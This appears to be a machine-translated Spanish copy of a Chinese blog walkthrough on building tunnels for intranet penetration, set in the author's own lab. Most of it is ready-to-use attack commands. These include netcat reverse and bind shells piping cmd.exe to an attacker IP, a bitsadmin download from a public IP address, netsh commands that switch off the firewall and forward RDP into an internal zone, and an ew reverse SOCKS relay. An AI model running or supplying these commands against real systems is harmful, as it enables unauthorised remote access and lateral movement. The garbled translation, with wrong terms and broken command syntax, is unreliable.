Establecimiento de túneles para la penetración de intranet

1. Detecta el protocolo saliente del servidor de intranet

sistema de ventanas

1. Detección fuera de la red del protocolo icmp

Haga ping a la dirección IP de sus propios vps

 

2. Detección fuera de la red del protocolo DNS

ping www.baidu.com

nslookup www.baidu.com

3. Detección de TCP fuera de la red

telnet vps ip

2 , nc

Avión de ataque: nc -lvvp 4444

Máquina víctima: nc vps-ip 4444

3,

bitsadmin / rawreturn / transfer down "http://120.79.66.58/1.gif" d: \ 1.txt

4,

powershell -exec bypass Import-Module. \ telnet.ps1 Test-PortConnectivity -Source 'localhost' -RemoteDestination '192.168.3.69' -Port 110 -Iterate -protocol TCP

En segundo lugar, construya un túnel de protocolo

1. Reenvío de puertos de Netsh

Netsh es una herramienta que viene con Windows para administrar la configuración de red y el firewall de Windows. La conexión tcp entrante se puede reenviar al
puerto de la computadora local o remota a través de netsh .

Esta herramienta solo se puede utilizar con derechos administrativos.

Puede ver el reenvío existente
netsh interface portproxy show all

Agregue una asignación de puerto de IPV4 a IPV4 para
netsh interface portproxy add v4tov4 listenport=22 connectaddress=ip connectport=port
eliminar el puerto de reenvío designado
netsh interface portproxy delete v4tov4 listenport=port

netsh advfirewall mostrar todos los perfiles Ver el estado del cortafuegos de todos los tipos de red en el sistema actual
netsh advfirewall establecer el estado de todos los perfiles desactivado Desactivar el cortafuegos del sistema actual
netsh advfirewall activar el estado de todos los perfiles Activar el cortafuegos del sistema actual

Crea un caparazón de avance:

1. Agregue una política de firewall para permitir el acceso externo al puerto 4444 a través del protocolo TCP

nombre de la regla: el nombre de la regla (cualquier nombre)

dir dirección acción (permitir, prohibir) protocolo: protocolo puerto local: puerto local

netsh advfirewall firewall agregar regla nombre = "nc en" dir = en acción = permitir protocolo = TCP puerto local = 4444

2. Cargue netcat-win32-1.12.zip en la máquina de destino, cambie al directorio y ejecute nc.exe -lvp 4444 -e cmd.exe

3. Ejecute nc64.exe -nv 192.168.206.129 4444 en la máquina atacante para obtener un shell directo

Crea un caparazón inverso:

Aviones de ataque

1. Agregue una política de firewall al atacante y abra el puerto 4443

Firewall netsh agregar portopening TCP 4443 "nc reverse shell"

2. El atacante monitorea el puerto 4443 nc64.exe -lvp 4443

Máquina objetivo

3. Agregue una política de firewall a la máquina de destino, permitiendo que el puerto 4443 pase el protocolo TCP

netsh advfirewall firewall agregar regla nombre = "nc reverse shell" dir = out action = permitir protocolo = TCP
localport = 4443

4. Utilice la herramienta nc cargada anteriormente en la máquina de destino para conectarse al puerto 4443 de la máquina atacante

nc64.exe -nv 192.168.206.1 4443 -e cmd.exe

5. El caparazón de la máquina objetivo se obtiene en la máquina atacante.

6. Aunque el enlace se ha establecido correctamente, no hay respuesta y no se puede ejecutar el comando.

7. A través de la investigación capa por capa, resulta que la máquina víctima es de 64 bits, por lo que se debe usar nc64.exe en lugar de nc.exe.

8. El atacante consiguió el caparazón de la víctima.

Puede ver que la máquina víctima utiliza el puerto 49169 para establecer un enlace con el puerto 4443 de la máquina de ataque. ESTABLECIDO (establecido) pid: 2560 

CLOSE_WAIT La otra parte cerró activamente la conexión o la red es anormal y la conexión se interrumpe

9.tasklist / svc | findtr "2560" encontrado a través de pid es la conexión establecida por nc64.exe

10, consulta de proceso wmic información detallada del proceso

Puerto de servidor de zona militar de avance

Máquina de límites

1. Agregue una política de firewall a la máquina de borde para permitir que el puerto 8888 se conecte

netsh advfirewall firewall agregar regla nombre = "3389 prueba" dir = en acción = permitir protocolo = TCP puerto local = 8888

2. Agregue una política de firewall para reenviar el tráfico del acceso del atacante al puerto 8888 de la máquina fronteriza al puerto 33389 del host en la zona militar.

interfaz netsh portproxy agregar v4tov4 listenport = 8888 connectaddress = 192.168.52.129 connectport = 3389

3. Verifique las reglas de reenvío
netsh interface portproxy show all

(Eliminar las reglas de reenvío  netsh interface portproxy delete v4tov4 listenport = 8888)

4. Compruebe si la máquina de borde está escuchando en el puerto 8888

Aviones de ataque

La operación que debe realizarse en la máquina atacante es muy simple, el puerto de inicio de sesión de escritorio remoto 8888 de la máquina de borde

Inicio de sesión exitoso en el servidor de winserver 2003 en la zona militar

192.168.206.129 es la dirección IP de la máquina de límites win7

reenvío de puertos iptables

No

ESE

Prueba de IP pública (no completada, inténtelo de nuevo todos los días)

(Mi vps es de 64 bits, busqué ew que piensa que no hay linux de 64 bits, muy vergonzoso)

1. Ver puertos abiertos de vps

firewall-cmd --list-port

2. Abra los puertos 6666 y 66667

firewall-cmd --zone = public --add-port = 6666 / tcp --permanent

firewall-cmd --zone = public --add-port = 6667 / tcp --permanent

3. Reinicie el firewall

4. Verifique si se enciende correctamente

5. El vps monitorea los puertos 6666 y 6667, la máquina atacante accede al puerto 6666 y la máquina de destino accede al puerto 6667.

./ew_linux_x64 -s rcsocks -l 6666 -e 6667 &

 Servidor Rebound SOCKS v5

Avión de ataque: win7  

Máquina de destino: winserver2003

1. Supervise los puertos 1080 y 888 del atacante

2. En la máquina de destino

3. Se ha establecido una conexión con el atacante.

4. Utilice SocksCap6 para la penetración posterior

 

 

 

 

 

 

 

Supongo que te gusta

Origin blog.csdn.net/qq_32393893/article/details/108310652
Recomendado
Clasificación